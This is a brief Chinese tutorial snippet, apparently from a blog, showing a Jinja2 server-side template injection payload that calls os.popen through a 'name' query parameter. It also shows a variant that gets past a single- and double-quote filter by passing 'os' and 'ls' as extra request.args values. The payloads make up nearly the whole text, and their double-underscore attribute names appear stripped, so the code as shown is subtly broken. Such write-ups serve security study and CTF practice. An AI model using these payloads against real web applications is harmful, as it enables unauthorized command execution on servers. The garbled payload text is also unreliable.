比如payload为
?name={{ config.class.init.globals[‘os’].popen (‘ls’).read() }}
但由于过滤单双引号,’os’和’ls’都不能使用了
利用request.args.a绕过
payload为
?name={{ config.class.init.globals[request.args.a].popen (request.args.b).read() }}&a=os&b=ls
若有收获,就点个赞吧
0 人点赞
